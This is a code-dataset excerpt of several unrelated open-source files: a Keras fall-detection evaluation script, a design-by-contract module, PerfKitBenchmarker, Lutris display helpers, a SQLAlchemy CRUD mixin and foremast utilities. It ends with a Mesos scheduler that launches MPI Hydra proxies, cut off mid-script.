x = BatchNormalization(axis=-1, momentum=0.99, epsilon=0.001)(x)
x = Activation('relu')(x)
x = Dropout(0.8)(x)
x = Dense(1, name='predictions', init='glorot_uniform')(x)
x = Activation('sigmoid')(x)
classifier = Model(
input=extracted_features, output=x, name='classifier'
)
fold_best_model_path = best_model_path + 'combined_fold_{}.h5'.format(
fold
)
classifier.compile(
optimizer=adam, loss='binary_crossentropy',
metrics=['accuracy']
)
if not use_checkpoint:
# ==================== TRAINING ========================
# weighting of each class: only the fall class gets
# a different weight
class_weight = {0:weight_0, 1: 1}
callbacks = None
if use_validation:
# callback definition
metric = 'val_loss'
e = EarlyStopping(
monitor=metric, min_delta=0,patience=100,
mode='auto'
)
c = ModelCheckpoint(
fold_best_model_path,
monitor=metric,
save_best_only=True,
save_weights_only=False, mode='auto'
)
callbacks = [e, c]
validation_data = None
if use_validation:
validation_data = (X_val,y_val)
_mini_batch_size = mini_batch_size
if mini_batch_size == 0:
_mini_batch_size = X_train.shape[0]
history = classifier.fit(
X_train, y_train,
validation_data=validation_data,
batch_size=_mini_batch_size,
nb_epoch=epochs,
shuffle='batch',
class_weight=class_weight,
callbacks=callbacks
)
if not use_validation:
classifier.save(fold_best_model_path)
plot_training_info(plots_folder + exp, ['accuracy', 'loss'],
save_plots, history.history)
if use_validation and use_val_for_training:
classifier = load_model(fold_best_model_path)
# Use full training set (training+validation)
X_train = np.concatenate((X_train, X_val), axis=0)
y_train = np.concatenate((y_train, y_val), axis=0)
history = classifier.fit(
X_train, y_train,
validation_data=validation_data,
batch_size=_mini_batch_size,
nb_epoch=epochs,
shuffle='batch',
class_weight=class_weight,
callbacks=callbacks
)
classifier.save(fold_best_model_path)
# ==================== EVALUATION ========================
# Load best model
print('Model loaded from checkpoint')
classifier = load_model(fold_best_model_path)
# Evaluate for the combined test set
predicted = classifier.predict(X_test)
for i in range(len(predicted)):
if predicted[i] < threshold:
predicted[i] = 0
else:
predicted[i] = 1
predicted = np.asarray(predicted).astype(int)
cm = confusion_matrix(y_test, predicted,labels=[0,1])
tp = cm[0][0]
fn = cm[0][1]
fp = cm[1][0]
tn = cm[1][1]
tpr = tp/float(tp+fn)
fpr = fp/float(fp+tn)
fnr = fn/float(fn+tp)
print('Combined test set')
print('-'*10)
tnr = tn/float(tn+fp)
print('TP: {}, TN: {}, FP: {}, FN: {}'.format(tp,tn,fp,fn))
print('TPR: {}, TNR: {}, FPR: {}, FNR: {}'.format(tpr,tnr,fpr,fnr))
print('Sensitivity/Recall: {}'.format(tp/float(tp+fn)))
print('Specificity: {}'.format(tn/float(tn+fp)))
print('Accuracy: {}'.format(accuracy_score(y_test, predicted)))
sensitivities['combined'].append(tp/float(tp+fn))
specificities['combined'].append(tn/float(tn+fp))
# Evaluate for the URFD test set
predicted = classifier.predict(X_test_urfd)
for i in range(len(predicted)):
if predicted[i] < threshold:
predicted[i] = 0
else:
predicted[i] = 1
predicted = np.asarray(predicted).astype(int)
cm = confusion_matrix(y_test_urfd, predicted,labels=[0,1])
tp = cm[0][0]
fn = cm[0][1]
fp = cm[1][0]
tn = cm[1][1]
tpr = tp/float(tp+fn)
fpr = fp/float(fp+tn)
fnr = fn/float(fn+tp)
tnr = tn/float(tn+fp)
print('URFD test set')
print('-'*10)
print('TP: {}, TN: {}, FP: {}, FN: {}'.format(tp,tn,fp,fn))
print('TPR: {}, TNR: {}, FPR: {}, FNR: {}'.format(tpr,tnr,fpr,fnr))
print('Sensitivity/Recall: {}'.format(tp/float(tp+fn)))
print('Specificity: {}'.format(tn/float(tn+fp)))
print('Accuracy: {}'.format(accuracy_score(y_test_urfd, predicted)))
sensitivities['urfd'].append(tp/float(tp+fn))
specificities['urfd'].append(tn/float(tn+fp))
# Evaluate for the Multicam test set
predicted = classifier.predict(X_test_multicam)
for i in range(len(predicted)):
if predicted[i] < threshold:
predicted[i] = 0
else:
predicted[i] = 1
predicted = np.asarray(predicted).astype(int)
cm = confusion_matrix(y_test_multicam, predicted,labels=[0,1])
tp = cm[0][0]
fn = cm[0][1]
fp = cm[1][0]
tn = cm[1][1]
tpr = tp/float(tp+fn)
fpr = fp/float(fp+tn)
fnr = fn/float(fn+tp)
tnr = tn/float(tn+fp)
print('Multicam test set')
print('-'*10)
print('TP: {}, TN: {}, FP: {}, FN: {}'.format(tp,tn,fp,fn))
print('TPR: {}, TNR: {}, FPR: {}, FNR: {}'.format(tpr,tnr,fpr,fnr))
print('Sensitivity/Recall: {}'.format(tp/float(tp+fn)))
print('Specificity: {}'.format(tn/float(tn+fp)))
print('Accuracy: {}'.format(accuracy_score(y_test_multicam, predicted)))
sensitivities['multicam'].append(tp/float(tp+fn))
specificities['multicam'].append(tn/float(tn+fp))
# Evaluate for the FDD test set
predicted = classifier.predict(X_test_fdd)
for i in range(len(predicted)):
if predicted[i] < threshold:
predicted[i] = 0
else:
predicted[i] = 1
predicted = np.asarray(predicted).astype(int)
cm = confusion_matrix(y_test_fdd, predicted,labels=[0,1])
tp = cm[0][0]
fn = cm[0][1]
fp = cm[1][0]
tn = cm[1][1]
tpr = tp/float(tp+fn)
fpr = fp/float(fp+tn)
fnr = fn/float(fn+tp)
tnr = tn/float(tn+fp)
print('FDD test set')
print('-'*10)
print('TP: {}, TN: {}, FP: {}, FN: {}'.format(tp,tn,fp,fn))
print('TPR: {}, TNR: {}, FPR: {}, FNR: {}'.format(tpr,tnr,fpr,fnr))
print('Sensitivity/Recall: {}'.format(tp/float(tp+fn)))
print('Specificity: {}'.format(tn/float(tn+fp)))
print('Accuracy: {}'.format(accuracy_score(y_test_fdd, predicted)))
sensitivities['fdd'].append(tp/float(tp+fn))
specificities['fdd'].append(tn/float(tn+fp))
# End of the Cross-Validation
print('CROSS-VALIDATION RESULTS ===================')
print("Sensitivity Combined: {:.2f}% (+/- {:.2f}%)".format(
np.mean(sensitivities['combined'])*100.,
np.std(sensitivities['combined'])*100.)
)
print("Specificity Combined: {:.2f}% (+/- {:.2f}%)\n".format(
np.mean(specificities['combined'])*100.,
np.std(specificities['combined'])*100.)
)
print("Sensitivity URFD: {:.2f}% (+/- {:.2f}%)".format(
np.mean(sensitivities['urfd'])*100.,
np.std(sensitivities['urfd'])*100.)
)
print("Specificity URFD: {:.2f}% (+/- {:.2f}%)\n".format(
np.mean(specificities['urfd'])*100.,
np.std(specificities['urfd'])*100.)
)
print("Sensitivity Multicam: {:.2f}% (+/- {:.2f}%)".format(
np.mean(sensitivities['multicam'])*100.,
np.std(sensitivities['multicam'])*100.)
)
print("Specificity Multicam: {:.2f}% (+/- {:.2f}%)\n".format(
np.mean(specificities['multicam'])*100.,
np.std(specificities['multicam'])*100.)
)
print("Sensitivity Multicam: {:.2f}% (+/- {:.2f}%)".format(
np.mean(sensitivities['fdd'])*100.,
np.std(sensitivities['fdd'])*100.)
)
print("Specificity FDDs: {:.2f}% (+/- {:.2f}%)".format(
np.mean(specificities['fdd'])*100.,
np.std(specificities['fdd'])*100.)
)
if __name__ == '__main__':
if not os.path.exists(best_model_path):
os.makedirs(best_model_path)
if not os.path.exists(plots_folder):
os.makedirs(plots_folder)
main() | mit | -6,793,754,311,319,093,000 | 37.325926 | 115 | 0.552205 | false |
ActiveState/code | recipes/Python/436834_Yet_another_Design_Contract_module/recipe-436834.py | 1 | 16029 | #!/usr/bin/env python
# -*- coding: iso-8859-1 -*-
###############################################################################
#
# Yet another invariant/pre-/postcondition design-by-contract support module.
#
# Written by Dmitry Dvoinikov <[email protected]>
# Distributed under MIT license.
#
# The latest version, complete with self-tests can be downloaded from:
# http://www.targeted.org/python/recipes/ipdbc.py
#
# Sample usage:
#
# import ipdbc.py
#
# class Balloon(ContractBase): # demonstrates class invariant
# def invariant(self):
# return 0 <= self.weight < 1000 # returns True/False
# def __init__(self):
# self.weight = 0
# def fails(self): # upon return this throws PostInvariantViolationError
# self.weight = 1000
#
# class GuidedBalloon(Balloon): # demonstrates pre/post condition
# def pre_drop(self, _weight): # pre_ receives exact copy of arguments
# return self.weight >= _weight # returns True/False
# def drop(self, _weight):
# self.weight -= _weight;
# return self.weight # the result of the call is passed
# def post_drop(self, result, _weight): # as a second parameter to post_
# return result >= 0 # followed again by copy of arguments
#
# Note: GuidedBalloon().fails() still fails, since Balloon's invariant is
# inherited.
# Note: All the dbc infused methods are inherited in the mro-correct way.
# Note: Neither classmethods nor staticmethods are decorated, only "regular"
# instance-bound methods.
#
# (c) 2005, 2006 Dmitry Dvoinikov <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
__all__ = ["ContractBase", "ContractViolationError", "InvariantViolationError",
"PreInvariantViolationError", "PostInvariantViolationError",
"PreConditionViolationError", "PostConditionViolationError",
"PreconditionViolationError", "PostconditionViolationError" ]
CONTRACT_CHECKS_ENABLED = True # allows to turn contract checks off when needed
###############################################################################
class ContractViolationError(AssertionError): pass
class InvariantViolationError(ContractViolationError): pass
class PreInvariantViolationError(InvariantViolationError): pass
class PostInvariantViolationError(InvariantViolationError): pass
class PreConditionViolationError(ContractViolationError): pass
PreconditionViolationError = PreConditionViolationError # pep 316 calls it such
class PostConditionViolationError(ContractViolationError): pass
PostconditionViolationError = PostConditionViolationError # pep 316 calls it such
###############################################################################
from types import FunctionType
from sys import hexversion
have_python_24 = hexversion >= 0x2040000
################################################################################
def any(s, f = lambda e: bool(e)):
for e in s:
if f(e):
return True
else:
return False
################################################################################
def none(s, f = lambda e: bool(e)):
return not any(s, f)
################################################################################
def empty(s):
return len(s) == 0
################################################################################
def pick_first(s, f = lambda e: bool(e)):
for e in s:
if f(e):
return e
else:
return None
################################################################################
if not have_python_24:
def reversed(s):
r = list(s)
r.reverse()
return r
################################################################################
def merged_mro(*classes):
"""
Returns list of all classes' bases merged and mro-correctly ordered,
implemented as per http://www.python.org/2.3/mro.html
"""
if any(classes, lambda c: not isinstance(c, type)):
raise TypeError("merged_mro expects all it's parameters to be classes, got %s" %
pick_first(classes, lambda c: not isinstance(c, type)))
def merge(lists):
result = []
lists = [ (list_[0], list_[1:]) for list_ in lists ]
while not empty(lists):
good_head, tail = pick_first(lists, lambda ht1: none(lists, lambda ht2: ht1[0] in ht2[1])) or (None, None)
if good_head is None:
raise TypeError("Cannot create a consistent method resolution "
"order (MRO) for bases %s" %
", ".join([ cls.__name__ for cls in classes ]))
result += [ good_head ]
i = 0
while i < len(lists):
head, tail = lists[i]
if head == good_head:
if empty(tail):
del(lists[i])
else:
lists[i] = ( tail[0], tail[1:] )
i += 1
else:
i += 1
return result
merged = [ cls.mro() for cls in classes ] + [ list(classes) ]
return merge(merged)
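# Illustrative example (not part of the original recipe): for classes
# A(object), B(object) and C(A, B), merged_mro(C) yields [C, A, B, object],
# i.e. the same linearization that C.mro() would produce.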
###############################################################################
class ContractFactory(type):
def _wrap(_method, preinvariant, precondition, postcondition, postinvariant,
_classname, _methodname):
def preinvariant_check(result):
if not result:
raise PreInvariantViolationError(
"Class invariant does not hold before a call to %s.%s"
% (_classname, _methodname))
def precondition_check(result):
if not result:
raise PreConditionViolationError(
"Precondition failed before a call to %s.%s"
% (_classname, _methodname))
def postcondition_check(result):
if not result:
raise PostConditionViolationError(
"Postcondition failed after a call to %s.%s"
% (_classname, _methodname))
def postinvariant_check(result):
if not result:
raise PostInvariantViolationError(
"Class invariant does not hold after a call to %s.%s"
% (_classname, _methodname))
if preinvariant is not None and precondition is not None \
and postcondition is not None and postinvariant is not None:
def dbc_wrapper(self, *args, **kwargs):
preinvariant_check(preinvariant(self))
precondition_check(precondition(self, *args, **kwargs))
result = _method(self, *args, **kwargs)
postcondition_check(postcondition(self, result, *args, **kwargs))
postinvariant_check(postinvariant(self))
return result
elif preinvariant is not None and precondition is not None \
and postcondition is not None and postinvariant is None:
def dbc_wrapper(self, *args, **kwargs):
preinvariant_check(preinvariant(self))
precondition_check(precondition(self, *args, **kwargs))
result = _method(self, *args, **kwargs)
postcondition_check(postcondition(self, result, *args, **kwargs))
return result
elif preinvariant is not None and precondition is not None \
and postcondition is None and postinvariant is not None:
def dbc_wrapper(self, *args, **kwargs):
preinvariant_check(preinvariant(self))
precondition_check(precondition(self, *args, **kwargs))
result = _method(self, *args, **kwargs)
postinvariant_check(postinvariant(self))
return result
elif preinvariant is not None and precondition is not None \
and postcondition is None and postinvariant is None:
def dbc_wrapper(self, *args, **kwargs):
preinvariant_check(preinvariant(self))
precondition_check(precondition(self, *args, **kwargs))
result = _method(self, *args, **kwargs)
return result
elif preinvariant is not None and precondition is None \
and postcondition is not None and postinvariant is not None:
def dbc_wrapper(self, *args, **kwargs):
preinvariant_check(preinvariant(self))
result = _method(self, *args, **kwargs)
postcondition_check(postcondition(self, result, *args, **kwargs))
postinvariant_check(postinvariant(self))
return result
elif preinvariant is not None and precondition is None \
and postcondition is not None and postinvariant is None:
def dbc_wrapper(self, *args, **kwargs):
preinvariant_check(preinvariant(self))
result = _method(self, *args, **kwargs)
postcondition_check(postcondition(self, result, *args, **kwargs))
return result
elif preinvariant is not None and precondition is None \
and postcondition is None and postinvariant is not None:
def dbc_wrapper(self, *args, **kwargs):
preinvariant_check(preinvariant(self))
result = _method(self, *args, **kwargs)
postinvariant_check(postinvariant(self))
return result
elif preinvariant is not None and precondition is None \
and postcondition is None and postinvariant is None:
def dbc_wrapper(self, *args, **kwargs):
preinvariant_check(preinvariant(self))
result = _method(self, *args, **kwargs)
return result
elif preinvariant is None and precondition is not None \
and postcondition is not None and postinvariant is not None:
def dbc_wrapper(self, *args, **kwargs):
precondition_check(precondition(self, *args, **kwargs))
result = _method(self, *args, **kwargs)
postcondition_check(postcondition(self, result, *args, **kwargs))
postinvariant_check(postinvariant(self))
return result
elif preinvariant is None and precondition is not None \
and postcondition is not None and postinvariant is None:
def dbc_wrapper(self, *args, **kwargs):
precondition_check(precondition(self, *args, **kwargs))
result = _method(self, *args, **kwargs)
postcondition_check(postcondition(self, result, *args, **kwargs))
return result
elif preinvariant is None and precondition is not None \
and postcondition is None and postinvariant is not None:
def dbc_wrapper(self, *args, **kwargs):
precondition_check(precondition(self, *args, **kwargs))
result = _method(self, *args, **kwargs)
postinvariant_check(postinvariant(self))
return result
elif preinvariant is None and precondition is not None \
and postcondition is None and postinvariant is None:
def dbc_wrapper(self, *args, **kwargs):
precondition_check(precondition(self, *args, **kwargs))
result = _method(self, *args, **kwargs)
return result
elif preinvariant is None and precondition is None \
and postcondition is not None and postinvariant is not None:
def dbc_wrapper(self, *args, **kwargs):
result = _method(self, *args, **kwargs)
postcondition_check(postcondition(self, result, *args, **kwargs))
postinvariant_check(postinvariant(self))
return result
elif preinvariant is None and precondition is None \
and postcondition is not None and postinvariant is None:
def dbc_wrapper(self, *args, **kwargs):
result = _method(self, *args, **kwargs)
postcondition_check(postcondition(self, result, *args, **kwargs))
return result
elif preinvariant is None and precondition is None \
and postcondition is None and postinvariant is not None:
def dbc_wrapper(self, *args, **kwargs):
result = _method(self, *args, **kwargs)
postinvariant_check(postinvariant(self))
return result
elif preinvariant is None and precondition is None \
and postcondition is None and postinvariant is None:
def dbc_wrapper(self, *args, **kwargs):
result = _method(self, *args, **kwargs)
return result
if have_python_24:
dbc_wrapper.__name__ = _methodname
return dbc_wrapper
_wrap = staticmethod(_wrap)
def __new__(_class, _name, _bases, _dict):
# because the mro for the class being created is not yet available
# we'll have to build it by hand using our own mro implementation
mro = merged_mro(*_bases) # the lack of _class itself in mro is compensated ...
dict_with_bases = {}
for base in reversed(mro):
if hasattr(base, "__dict__"):
dict_with_bases.update(base.__dict__)
dict_with_bases.update(_dict) # ... here by explicitly adding it's method last
try:
invariant = dict_with_bases["invariant"]
except KeyError:
invariant = None
for name, target in dict_with_bases.iteritems():
if isinstance(target, FunctionType) and name != "__del__" and name != "invariant" \
and not name.startswith("pre_") and not name.startswith("post_"):
try:
pre = dict_with_bases["pre_%s" % name]
except KeyError:
pre = None
try:
post = dict_with_bases["post_%s" % name]
except KeyError:
post = None
# note that __del__ is not checked at all
_dict[name] = ContractFactory._wrap(target,
name != "__init__" and invariant or None,
pre or None, post or None, invariant or None,
_name, name)
return super(ContractFactory, _class).__new__(_class, _name, _bases, _dict)
class ContractBase(object):
if CONTRACT_CHECKS_ENABLED:
__metaclass__ = ContractFactory
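# --- Added illustration (not part of the original module): a minimal, hedged
# sketch of a class opting in to the pre_*/post_*/invariant naming convention
# that ContractFactory wraps above. The _ExampleCounter class and its
# conditions are hypothetical.
class _ExampleCounter(ContractBase):
    def invariant(self):
        # evaluated around every public call (skipped before __init__)
        return self.value >= 0
    def __init__(self):
        self.value = 0
    def pre_increment(self, amount):
        # receives the same arguments as increment()
        return amount > 0
    def post_increment(self, result, amount):
        # receives the return value first, then the original arguments
        return result == self.value
    def increment(self, amount):
        self.value += amount
        return self.value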
###############################################################################
| mit | -315,259,735,851,058,900 | 43.401662 | 118 | 0.558924 | false |
meteorfox/PerfKitBenchmarker | perfkitbenchmarker/providers/kubernetes/provider_info.py | 1 | 1386 | # Copyright 2015 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Provider info for Kubernetes
"""
from perfkitbenchmarker import providers
from perfkitbenchmarker import provider_info
class KubernetesProviderInfo(provider_info.BaseProviderInfo):
SUPPORTED_BENCHMARKS = ['block_storage_workload', 'cassandra_ycsb',
'cassandra_stress', 'cluster_boot', 'fio',
'iperf', 'mesh_network', 'mongodb_ycsb',
'netperf', 'redis', 'sysbench_oltp']
UNSUPPORTED_BENCHMARKS = ['bonnieplusplus', 'mysql_service']
CLOUD = providers.KUBERNETES
@classmethod
def IsBenchmarkSupported(cls, benchmark):
if benchmark in cls.SUPPORTED_BENCHMARKS:
return True
elif benchmark in cls.UNSUPPORTED_BENCHMARKS:
return False
else:
return None
| apache-2.0 | 4,174,904,977,737,770,500 | 33.65 | 74 | 0.7114 | false |
RobLoach/lutris | lutris/util/display.py | 1 | 3005 | import subprocess
from lutris.util.log import logger
def get_vidmodes():
xrandr_output = subprocess.Popen(["xrandr"],
stdout=subprocess.PIPE).communicate()[0]
return list([line for line in xrandr_output.decode().split("\n")])
def get_outputs():
"""Return list of tuples containing output name and geometry."""
outputs = []
vid_modes = get_vidmodes()
if not vid_modes:
logger.error("xrandr didn't return anything")
return []
for line in vid_modes:
parts = line.split()
if len(parts) < 2:
continue
if parts[1] == 'connected':
if len(parts) == 2:
continue
geom = parts[2] if parts[2] != 'primary' else parts[3]
if geom.startswith('('): # Screen turned off, no geometry
continue
outputs.append((parts[0], geom))
return outputs
def get_output_names():
return [output[0] for output in get_outputs()]
def turn_off_except(display):
for output in get_outputs():
if output[0] != display:
subprocess.Popen(["xrandr", "--output", output[0], "--off"])
def get_resolutions():
"""Return the list of supported screen resolutions."""
resolution_list = []
for line in get_vidmodes():
if line.startswith(" "):
resolution_list.append(line.split()[0])
return resolution_list
def get_current_resolution(monitor=0):
"""Return the current resolution for the desktop."""
resolution = list()
for line in get_vidmodes():
if line.startswith(" ") and "*" in line:
resolution.append(line.split()[0])
if monitor == 'all':
return resolution
else:
return resolution[monitor]
def change_resolution(resolution):
"""Change display resolution.
Takes a string for single monitors or a list of displays as returned
by get_outputs().
"""
if not resolution:
logger.warning("No resolution provided")
return
if isinstance(resolution, str):
logger.debug("Switching resolution to %s", resolution)
if resolution not in get_resolutions():
logger.warning("Resolution %s doesn't exist." % resolution)
else:
subprocess.Popen(["xrandr", "-s", resolution])
else:
for display in resolution:
display_name = display[0]
logger.debug("Switching to %s on %s", display[1], display[0])
display_geom = display[1].split('+')
display_resolution = display_geom[0]
position = (display_geom[1], display_geom[2])
subprocess.Popen([
"xrandr",
"--output", display_name,
"--mode", display_resolution,
"--pos", "{}x{}".format(position[0], position[1])
]).communicate()
def restore_gamma():
"""Restores gamma to a normal level."""
subprocess.Popen(["xgamma", "-gamma", "1.0"])
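# Added usage sketch (illustrative, not part of the original module; output
# names and geometries are assumptions about a typical xrandr setup):
#   outputs = get_outputs()           # e.g. [('DP-1', '1920x1080+0+0')]
#   change_resolution('1280x1024')    # string form: switch the primary screen
#   change_resolution(outputs)        # list form: mode + position per output
#   restore_gamma()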
| gpl-3.0 | 8,808,335,972,586,504,000 | 29.663265 | 77 | 0.575707 | false |
ctsit/redi-dropper-client | app/redidropper/database/crud_mixin.py | 1 | 1438 | """
Goal: simplify the code when interacting with entities
Usage when declaring a model:
import db
class MyEntity(db.Model, CRUDMixin):
id = db.Column('myID', db.Integer, primary_key=True)
data = db.Column('myData', db.String(255))
    MyEntity.create(data="abc")
    my = MyEntity(data="abc")
    my.save(commit=False)
    found = MyEntity.get_by_id(1) is not None
"""
from redidropper.main import db
class CRUDMixin(object):
""" Helper class flask-sqlalchemy entities """
__table_args__ = {'extend_existing': True}
id = db.Column(db.Integer, primary_key=True)
@classmethod
def get_by_id(cls, id):
if any(
(isinstance(id, basestring) and id.isdigit(),
isinstance(id, (int, float))),
):
return cls.query.get(int(id))
return None
@classmethod
def create(cls, **kwargs):
""" Helper for session.add() + session.commit() """
instance = cls(**kwargs)
return instance.save()
def update(self, commit=True, **kwargs):
for attr, value in kwargs.iteritems():
setattr(self, attr, value)
return self.save() if commit else self
def save(self, commit=True):
db.session.add(self)
if commit:
db.session.commit()
return self
def delete(self, commit=True):
db.session.delete(self)
return commit and db.session.commit()
| bsd-3-clause | -703,312,452,427,858,200 | 25.145455 | 59 | 0.616134 | false |
gogoair/foremast | src/foremast/utils/__init__.py | 1 | 1409 | # Foremast - Pipeline Tooling
#
# Copyright 2018 Gogo, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Package for foremast supporting utilities."""
from .apps import *
from .asg import *
from .banners import *
from .pipelines import *
from .deep_chain_map import DeepChainMap
from .elb import *
from .encoding import *
from .generate_filename import *
from .dns import *
from .credentials import *
from .properties import *
from .security_group import *
from .subnets import *
from .vpc import *
from .lookups import *
from .slack import *
from .tasks import *
from .templates import *
from .warn_user import *
from .get_cloudwatch_event_rule import get_cloudwatch_event_rule
from .awslambda import *
from .get_sns_subscriptions import get_sns_subscriptions
from .get_sns_topic_arn import get_sns_topic_arn
from .dynamodb_stream import get_dynamodb_stream_arn
from .roles import *
| apache-2.0 | -4,017,467,727,844,260,000 | 33.365854 | 76 | 0.751597 | false |
mesosphere/mesos-hydra | mrun.py | 1 | 8006 | #!/usr/bin/env python
import mesos
import mesos_pb2
import os
import logging
import re
import sys
import time
import math
import threading
import socket
import time
import tempfile
from optparse import OptionParser
from subprocess import *
def printOutput(p):
for line in p.stdout:
print line,
def startMPIExec(procs, slaves, program):
os.symlink(os.getcwd() + '/export', work_dir + "/export")
os.chdir(work_dir)
hosts = ",".join(slaves)
cmd = ["./export/bin/mpiexec.hydra", "-genv", "LD_LIBRARY_PATH", work_dir + "/libs", "-launcher", "manual", "-n", str(procs), "-hosts", str(hosts)]
cmd.extend(program)
p = Popen(cmd, stdout=PIPE)
proxy_args = []
while True:
line = p.stdout.readline()
if line == 'HYDRA_LAUNCH_END\n':
break
proxy_args.append(line)
# Print rest MPI output.
t = threading.Thread(target=printOutput, args=([p]))
t.start()
return proxy_args
def finalizeSlaves(callbacks):
time.sleep(1)
logging.info("Finalize slaves")
hosts = []
for slave in callbacks:
hosts.append(slave[0])
proxy_args = startMPIExec(total_procs, hosts, mpi_program)
proxy_id = 0
for slave in callbacks:
chost = slave[0]
cport = int(slave[1])
proxy_arg = proxy_args[proxy_id]
proxy_id += 1
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((chost, cport))
request = work_dir + ";" + proxy_arg
s.send(request)
s.close()
# TODO(nnielsen): Add retry logic; slave might not be listening yet.
logging.info("Done finalizing slaves")
class HydraScheduler(mesos.Scheduler):
def __init__(self, options):
self.proxiesLaunched = 0
self.proxiesRunning = 0
self.proxiesFinished = 0
self.options = options
self.startedExec = False
self.slaves = set()
self.callbacks = []
self.finalizeTriggered = False
def registered(self, driver, fid, masterInfo):
logging.info("Registered with framework ID %s" % fid.value)
def resourceOffers(self, driver, offers):
for offer in offers:
if self.proxiesLaunched == total_nodes:
driver.declineOffer(offer.id)
continue
cpus = 0
mem = 0
tasks = []
if offer.hostname in self.slaves:
                logging.info("Declining offer: offer from slave already scheduled")
                driver.declineOffer(offer.id)
                continue
for resource in offer.resources:
if resource.name == "cpus":
cpus = resource.scalar.value
elif resource.name == "mem":
mem = resource.scalar.value
elif resource.name == "ports":
port = resource.ranges.range[0].begin
if cpus < cores_per_node or mem < mem_per_node:
logging.info("Declining offer due to too few resources")
driver.declineOffer(offer.id)
else:
tid = self.proxiesLaunched
self.proxiesLaunched += 1
logging.info("Launching proxy on offer %s from %s" % (offer.id, offer.hostname))
task = mesos_pb2.TaskInfo()
task.task_id.value = str(tid)
task.slave_id.value = offer.slave_id.value
task.name = "task %d " % tid
cpus = task.resources.add()
cpus.name = "cpus"
cpus.type = mesos_pb2.Value.SCALAR
cpus.scalar.value = cores_per_node
mem = task.resources.add()
mem.name = "mem"
mem.type = mesos_pb2.Value.SCALAR
mem.scalar.value = mem_per_node
ports = task.resources.add()
ports.name = "ports"
ports.type = mesos_pb2.Value.RANGES
r = ports.ranges.range.add()
r.begin = port
r.end = port
lib = task.command.environment.variables.add()
lib.name = "LD_LIBRARY_PATH"
lib.value = work_dir + "/libs"
hydra_uri = task.command.uris.add()
hydra_uri.value = "hdfs://" + name_node + "/hydra/hydra.tgz"
executable_uri = task.command.uris.add()
executable_uri.value = "hdfs://" + name_node + "/hydra/" + mpi_program[0]
task.command.value = "python hydra-proxy.py %d" % port
tasks.append(task)
logging.info("Replying to offer: launching proxy %d on host %s" % (tid, offer.hostname))
logging.info("Call-back at %s:%d" % (offer.hostname, port))
self.callbacks.append([offer.hostname, port])
self.slaves.add(offer.hostname)
driver.launchTasks(offer.id, tasks)
def statusUpdate(self, driver, update):
if (update.state == mesos_pb2.TASK_FAILED or
update.state == mesos_pb2.TASK_KILLED or
update.state == mesos_pb2.TASK_LOST):
logging.error("A task finished unexpectedly: " + update.message)
driver.stop()
if (update.state == mesos_pb2.TASK_RUNNING):
self.proxiesRunning += 1
# Trigger real launch when threshold is met.
if self.proxiesRunning >= total_nodes and not self.finalizeTriggered:
self.finalizeTriggered = True
threading.Thread(target = finalizeSlaves, args = ([self.callbacks])).start()
if (update.state == mesos_pb2.TASK_FINISHED):
self.proxiesFinished += 1
if self.proxiesFinished == total_nodes:
logging.info("All processes done, exiting")
driver.stop()
def offerRescinded(self, driver, offer_id):
logging.info("Offer %s rescinded" % offer_id)
if __name__ == "__main__":
parser = OptionParser(usage="Usage: %prog [options] mesos_master mpi_program")
parser.disable_interspersed_args()
parser.add_option("-N", "--nodes",
help="number of nodes to run processes (default 1)",
dest="nodes", type="int", default=1)
parser.add_option("-n", "--num",
help="total number of MPI processes (default 1)",
dest="procs", type="int", default=1)
parser.add_option("-c", "--cpus-per-task",
help="number of cores per MPI process (default 1)",
dest="cores", type="int", default=1)
parser.add_option("-m","--mem",
help="number of MB of memory per MPI process (default 1GB)",
dest="mem", type="int", default=1024)
parser.add_option("--proxy",
help="url to proxy binary", dest="proxy", type="string")
parser.add_option("--name",
help="framework name", dest="name", type="string")
parser.add_option("--hdfs",
help="HDFS Name node", dest="name_node", type="string")
parser.add_option("-p","--path",
help="path to look for MPICH2 binaries (mpiexec)",
dest="path", type="string", default="")
parser.add_option("-v", action="store_true", dest="verbose")
# Add options to configure cpus and mem.
(options,args) = parser.parse_args()
if len(args) < 2:
print >> sys.stderr, "At least two parameters required."
print >> sys.stderr, "Use --help to show usage."
exit(2)
if options.verbose == True:
logging.basicConfig(level=logging.INFO)
total_procs = options.procs
total_nodes = options.nodes
cores = options.cores
procs_per_node = math.ceil(total_procs / total_nodes)
cores_per_node = procs_per_node * cores
mem_per_node = options.mem
mpi_program = args[1:]
name_node = options.name_node
if name_node == None:
name_node = os.environ.get("HDFS_NAME_NODE")
if name_node == None:
print >> sys.stderr, "HDFS name node not found."
exit(2)
logging.info("Connecting to Mesos master %s" % args[0])
logging.info("Total processes %d" % total_procs)
logging.info("Total nodes %d" % total_nodes)
logging.info("Procs per node %d" % procs_per_node)
